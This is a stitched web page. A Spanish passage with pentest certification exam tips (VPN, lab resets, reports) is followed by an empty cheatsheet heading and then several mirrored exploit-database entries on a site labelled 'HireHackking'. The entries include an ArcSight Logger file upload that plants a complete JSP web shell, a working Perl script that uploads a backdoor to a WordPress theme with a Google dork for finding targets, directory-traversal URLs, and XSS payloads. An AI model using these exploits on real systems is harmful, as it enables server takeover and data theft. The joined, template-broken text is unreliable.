Lo segundo es la VPN para que puedas conectarte al laboratorio, OJO, importante, antes de empezar la certificación, define bien y conoce las credenciales de la VPN, las puedes editar en la parte superior derecha de la web de eLearnSecurity.
Digo esto, porque empecé y encendí el laboratorio, y cuando me di cuenta, no tenía las credenciales que le puse en su momento cuando hice el eJPT. Por lo que tuve que gastar un reset del laboratorio.
Hablando de esto último, puedes resetear el laboratorio hasta 4 veces cada día, ese es el límite.
Dicho esto, el examen dura 14 días. Tienes 7 días de laboratorio y otros 7 días para realizar el reporte. No tienes por qué seguir esto, me refiero, si acabas el examen y haces el reporte, todo en 4 días, puedes entregarlo perfectamente. Yo empecé el examen el día 3, entregué el reporte el día 8 y por suerte, han tardado menos de 1 día en corregírmelo (eLearnSecurity te indica que como mucho pueden tardar hasta 30 días laborables, pero que suele ser mucho menos).
No olvidar que eLearnSecurity no prohíbe ningún tipo de herramienta en sus exámenes, puedes usar lo que quieras.
En cuanto a cuanto se puede tardar en hacer el examen, yo pienso que estando un fin de semana al completo, da tiempo suficiente, hablando de la parte práctica. Yo empecé el viernes a las 6 de la tarde y el lunes por la mañana ya tenía todo listo, contando que, casi todo el día del domingo estuve fuera. Y ya pues desde el lunes al miércoles, que ya me lo tomé con bastante más calma, hice el reporte.
Para hacer el reporte podéis hacer uso de alguna plantilla, yo hice uso de la de TheMayor, que podéis descargar desde aquí. También está la de TCM que podéis descargar desde aquí. O podéis hacerlo de cero, eso ya a cada cual.
Por comentar, mi experiencia haciendo un reporte era 0, literalmente este es el primero que he hecho, así que si estás igual que lo estaba yo, no te preocupes. Siguiendo un poco la plantilla, poniéndole tu toque y estructurarlo de la forma que mejor creas, irás bien.
Para el reporte, recuerda tomar capturas de todo procedimiento y comando que ejecutes, mejor que sobren explicaciones y capturas que no que falten. Yo por ejemplo conforme hacia el examen iba haciendo capturas y pegándolas en un Word, con alguna frase descriptiva para poder identificar rápidamente de que eran esas capturas. Porque cuando tienes 2 páginas es fácil, pero cuando tengas 30 quizás cuesta un poco más jeje.
Como dato, a mí el reporte final me ocupó 65 páginas, esto no lo tomes como referencia del tipo, si haces menos páginas es peor, no, para nada. Un compañero mío su reporte fueron 47 páginas aproximadamente y también estuvo bien.
Tips
Por comentar algún que otro tip, yo diría que creéis persistencia en todas las máquinas que podáis. No porque os lo pida el examen, sino por comodidad vuestra. Poder acceder a un equipo sin tener que volver a explotar la vulnerabilidad es bastante cómodo, sobre todo en un examen que llevará algún que otro día y conllevará que apagues el PC en ocasiones.
También, guarda las capturas de nmap cuando analices por primera vez un equipo. Así no tendrás que resetear el laboratorio para hacer captura de los puertos abiertos por defecto (como hice yo xd).
Por lo demás, no hay mucho más, tener los conocimientos ya mencionados previamente e ir con ganas.

Cheatsheet para aprobar 100% seguro no fake
Si estás haciendo el examen y te quedas estancado, solo recuerda esto:
Mientras hacia el examen, conforme avanzaba, me di cuenta en ocasiones de que todo era más fácil de lo que creía, por lo que me escribí esto en un folio. Recuerda que esto no es un CTF, las cosas no son tan complejas, que no quiere decir que sean fáciles, simplemente, no hay cosas tan rebuscadas.

HireHackking

ArcSight Logger - Arbitrary File Upload / Code Execution

HACKER · %s · %s

# Exploit Title: ArcSight Logger - Arbitrary File Upload (Code Execution) # Date: 13.03.2015 # Exploit Author: Julian Horoszkiewicz # Vendor Homepage: www.hp.com # Software Link: http://www8.hp.com/us/en/software-solutions/arcsight-logger-log-management/try-now.html # Version: ArcSight Logger 5.3.1.6838.0 and prior versions # Tested on: Red Hat Linux # CVE: CVE-2014-7884 [ Description ] Configuration import file upload capability does not fully sanitize file names, which allows attackers to put executable files into the document root. Upload of server side (JSP) script with shell accessing function in order to gain remote OS command execution has been conducted in the POC. To access vulnerable feature, user has to be authenticated in the console. Feature is available to all users, also non-administrative ones. Shell commands are executed with default NPA privileges (arcsight) giving full control over the service (for instance /etc/init.d/arcsight_logger stop has been successfully performed). The culprit feature is accessible to all authenticated users, including ones with sole read-only admin role. [ Proof of Concept ] Attention, to reproduce the attack for the first time, two requests are required. First request magically creates subdirectory in the /opt/arcsight/current/backups upload dir. Second one puts the actual JSP web shell into the document root, by using path traversal refering to the upload dir subdirectory. Other combinations of direct name manipulation in order to upload anything to the document root did not succeed during the test (references to the upload dir without a subdirectory were refused by the application). The only required difference between the requests to achieve successful upload into desired location is the filename property in the Content-Disposition HTTP header. The general rule is as follows: First request (create /opt/arcsight/current/backups/some_new_dir directory, the uploaded file is irrelevant): Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/whatever" Second request (upload the file into location of choice by traversally refering to that subdirectory): Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/../../local/tomcat/webapps/logger/hellcode.jsp" Please also note that valid tokens (asf_token, session_string, JSESSIONID) are required. The most efficient way to reproduce this is: 1) name the local JSP web shell file toanything.xml.gz extension 2) choose to import it in the Configuration->Content Management->Import section through the web browser 3) intercept the browser traffic with a local proxy (Burp Suite for instance) 4) change the filename property in the Content-Disposition header so it contains the name of new subdirectory and forward the request 5) send another copy of the same request, this time with filename referring to the subdirectory created with previous request, using path traversal to point into the Logger document root, successfully uploading the web shell. 6) Navigate the browser to http://victim.com:9000/logger/hellcode.jsp Full requests: POST /logger/import_content_config_upload.ftl? HTTP/1.1 Host: victim.com:9000 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://victim.com:9000/logger/import_content_config_upload.ftl? Cookie: com.arcsight.product.platform.logger.client.session.SessionContext.productName=Logger; com.arcsight.product.platform.logger.client.session.SessionContext.arcsightProductName=ArcSight%20Logger; JSESSIONID=F89541D136E58EFD4B2377313B56B594; user_id_seq=7; session_string=TjF-x1fSWrKb3_tC0mYf7bQ3tVMaoD6kjmBItnWftsk. Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------17152166115305 Content-Length: 1565 -----------------------------17152166115305 Content-Disposition: form-data; name="uploadid" -----------------------------17152166115305 Content-Disposition: form-data; name="update" true -----------------------------17152166115305 Content-Disposition: form-data; name="asf_token" 7caea3f1-7bfb-4419-a4bb-4a19e3800bff -----------------------------17152166115305 Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/hellcode.jsp" Content-Type: application/x-gzip <%@ page import="java.util.*,java.io.*"%> <HTML> <TITLE>Laudanum JSP Shell</TITLE> <BODY> Commands with JSP <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"><br/> If you use this against a Windows box you may need to prefix your command with cmd.exe /c </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> <hr/> <address> Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/> Written by Tim Medin.<br/> Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>. </address> </BODY></HTML> -----------------------------17152166115305-- POST /logger/import_content_config_upload.ftl? HTTP/1.1 Host: victim.com:9000 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://victim.com:9000/logger/import_content_config_upload.ftl? Cookie: com.arcsight.product.platform.logger.client.session.SessionContext.productName=Logger; com.arcsight.product.platform.logger.client.session.SessionContext.arcsightProductName=ArcSight%20Logger; JSESSIONID=F89541D136E58EFD4B2377313B56B594; user_id_seq=7; session_string=TjF-x1fSWrKb3_tC0mYf7bQ3tVMaoD6kjmBItnWftsk. Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------17152166115305 Content-Length: 1565 -----------------------------17152166115305 Content-Disposition: form-data; name="uploadid" -----------------------------17152166115305 Content-Disposition: form-data; name="update" true -----------------------------17152166115305 Content-Disposition: form-data; name="asf_token" 7caea3f1-7bfb-4419-a4bb-4a19e3800bff -----------------------------17152166115305 Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/../../local/tomcat/webapps/logger/hellcode.jsp" Content-Type: application/x-gzip <%@ page import="java.util.*,java.io.*"%> <HTML> <TITLE>Laudanum JSP Shell</TITLE> <BODY> Commands with JSP <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"><br/> If you use this against a Windows box you may need to prefix your command with cmd.exe /c </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> <hr/> <address> Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/> Written by Tim Medin.<br/> Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>. </address> </BODY></HTML> -----------------------------17152166115305-- [ Time line ] 28.08.2014 - vulnerability report sent to HP 21.01.2015 - new version containing the fix released by HP 12.03.2015 - security bulletin published (CVE-2014-7884) [ Credits ] Julian Horoszkiewicz - IT Security Specialist @ ING Services Polska
HireHackking

WordPress Theme DesignFolio Plus 1.2 - Arbitrary File Upload

HACKER · %s · %s

######################################################### # Exploit Title: Wordpress Theme DesignFolio+ Arbitrary File Upload Vulnerability # Google dork: inurl:wp-content/themes/DesignFolio-Plus # Author: CrashBandicot # Date: 04.03.2015 # Vendor HomePage: https://github.com/UpThemes/DesignFolio-Plus # Software Link: https://github.com/UpThemes/DesignFolio-Plus/archive/master.zip # tested on : MsWin32 ######################################################### Vulnerable File : upload-file.php <?php //Upload Security $upload_security = md5($_SERVER['SERVER_ADDR']); $uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/"; if( $_FILES[$upload_security] ): $file = $_FILES[$upload_security]; $file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name']))))); if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)): if(chmod($file,0777)): echo "success"; else: echo "error".$_FILES[$upload_security]['tmp_name']; endif; else: echo "error".$_FILES[$upload_security]['tmp_name']; endif; endif; ?> Exploit #!/usr/bin/perl use Digest::MD5 qw(md5 md5_hex); use MIME::Base64; use IO::Socket; use LWP::UserAgent; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print "\n\t ! *** # ^_^ # *** !\n\t :p\n\n"; $use = "\n\t [!] ./$0 127.0.0.1 backdoor.php"; ($target ,$file) = @ARGV; die "$use" unless $ARGV[0] && $ARGV[1]; if($target =~ /http:\/\/(.*)\//){ $target = $1; } elsif($target =~ /http:\/\/(.*)/){ $target = $1; } elsif($target =~ /https:\/\/(.*)\//){ $target = $1; } elsif($target =~ /https:\/\/(.*)/){ $target = $1; } my $addr = inet_ntoa((gethostbyname($target))[4]); my $digest = md5_hex($addr); my $dir = encode_base64('../../../../'); my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},); $pst = $ua->post("http://".$target."/wp-content/themes/designfolio-plus/admin/upload-file.php", Content_Type => 'form-data', Content => [ $digest => [$file] , upload_path => $dir ]); if($pst->is_success) { print "[+] Backdoor Uploaded !"; } else { print "\n [-] Bad Response Header :/ FAIL"; } __END__ # File path: http://target/shell.php
HireHackking

Oxide WebServer - Directory Traversal

HACKER · %s · %s

source: https://www.securityfocus.com/bid/50845/info Oxide WebServer is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface. Exploiting this issue will allow an attacker to view arbitrary files within the context of the webserver. Information harvested may aid in launching further attacks. http://www.example.com/..\..\..\boot.ini http://www.example.com/..\\..\\..\\boot.ini http://www.example.com/..\/..\/..\/boot.ini http://www.example.com//..\/..\/..\boot.ini http://www.example.com/.\..\.\..\.\..\boot.ini
HireHackking
source: https://www.securityfocus.com/bid/50857/info OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. OrangeHRM 2.6.11 is vulnerable; prior versions may also be affected. http://www.example.com/index.php?menu_no_top=eim&uniqcode=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28123%29;% 3C/script%3E http://www.example.com/index.php?menu_no_top=eim&uniqcode=USR&isAdmin=%22%3E%3C/iframe%3E%3Cscript%3E alert%28123%29;%3C/script%3E